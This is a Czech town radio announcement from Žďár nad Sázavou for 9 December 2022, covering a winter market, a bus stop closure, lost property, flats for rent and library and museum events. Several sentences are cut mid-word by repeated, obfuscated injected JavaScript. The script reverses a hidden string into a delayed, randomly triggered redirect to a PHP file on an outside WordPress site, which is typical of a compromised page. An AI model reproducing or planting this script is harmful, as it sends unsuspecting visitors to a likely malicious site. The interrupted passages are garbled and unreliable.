Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 9. prosinec 2022

Pátek, 9. prosince 2022

Hlášení městského rozhlasu vysílaného dne 9. prosinec 2022

Vážení občané, vítáme Vás při vysílání městského rozhlasu

 

Z ÚŘADU:

 

Měs };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou Vás zve na tradiční Zimní trh, který se uskuteční ve čtvrtek 15. prosince 2022 na nám. Republiky, a };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to v době od 8:00 do 18:00 hodin. Můžete se těšit na proutěné, dřevěné i textilní zboží, dále hračky, dárkové předměty, ale i potraviny. Všichni jste srdečně zváni.

Odbor komunálních služeb oznamuje, že zrušení zastávky MHD Vodojem Jamborova se prodlužuje do 16. prosince 2022. Zastávka bude uvedena do provozu od soboty 17. prosince 2022.

Nejbližší zastávky jsou Novoměstská a Neumannova.

Pro dotčené linky MHD č. 4, 6 a 8 budou vydány výlukové jízdní řády,

Děkujeme za pochopení

Městský úřad, odbor komunálních služeb oznamuje, že do 31. března 2023 dochází ke změně provozní doby sběrného dvora na Jihlavské ulici. Více informací naleznete na webu města.

ZTRÁTY A NÁLEZY:

Městský úřad, odbor finanční oznamuje, že na ztráty a nálezy byly předány platební karta, klíč od vozu, sluchátka a mobilní telefon. Seznam všech nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři, 1. patro, dveře č. 35 – ztráty a nálezy.

VYHLÁŠENÉ ZÁMĚRY MĚSTA:

Měs };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou vyhlásilo záměr na pronájem bytu na ulici Brodská, č. p. 1876, č. or. 27, byt číslo 29. Velikost bytu je 1+1. Základní měsíční nájemné činí 1 755,- Kč. Uvedený byt bude k dispozici od 1. února 2023. Uzavírka záměru je 15. prosince 2022 ve 12:00 hodin.

Měs };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou vyhlásilo záměr na pronájem bytu na ulici Brodská, č. p. 1876, č. or. 27, byt číslo 6. Velikost bytu je 1+1. Základní měsíční nájemné činí 1 755,- Kč. Uvedený byt bude k dispozici od 1. února 2023. Uzavírka záměru je 22. prosince 2022 ve 12:00 hodin.

KULTURNÍ POZVÁNKY:

Knihovna Matěje Josefa Vás zve na Tradiční vánoční tvořivou dílnu, která se koná 14. prosince od 14:00 v dětském oddělení knihovny. Akci pořádá Asociace rodičů a přátel zdravotně postižených dětí ve Žďáře nad Sázavou

- Klub Úsměv.

Oddělení pro děti a mládež Knihovny M. J. Sychry pořádá společné čtení vánočních příběhů a hraní koled v podání žáků z kytarové třídy Milana Kozla ze žďárské Základní umělecké školy. Předvánoční zastavení proběhne 15.prosince v 16:30 v dětském oddělení knihovny.

Knihovna Matěje Josefa Sychry Vás zve ve dnech 12. - 16. prosince 2022 na prodejní výstavu výrobků uživatelů denního stacionáře STACÍK, Žďár nad Sázavou, která bude umístěna v oddělení pro dospělé čtenáře.

Poslední z cyklu přednášek profesora Čechury Baroko všedního dne proběhne ve středu 14. prosince 2022 v 17:00 hodin. Přednáška se koná na Staré radnici. Téma je obyčejný život v baroku. Jednorázové vstupné 80 Kč se platí na místě.

V Regionálním muzeum na tvrzi je otevřená výstava Vánoce v devadesátkách s podtitulem Ježíšku, Santa přichází. Výstavu můžete navštívit do 15. ledna 2023 každý den mimo pondělí. Výstava je věnovaná vánočním dárkům, mezi kterými nebudou chybět třeba elasťáky, videokazety nebo walkmany.

Knihovna Matěje Josefa Sychry ve spolupráci s Oblastní chari };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou Žďár nad Sázavou pořádá sbírku potravin a drogistických potřeb pro lidi v nouzi - Mikuláš z knihovny. Zájemci mohou přinést trvanlivé potraviny a drogistické zboží v termínu do 12. prosince 2022 v provozní době knihovny. Sbírka probíhá v oddělení pro dospělé čtenáře. Podrobný seznam potřebných věcí naleznete na webových stránkách www.knihzdar.cz.

 

KONEC HLÁŠENÍ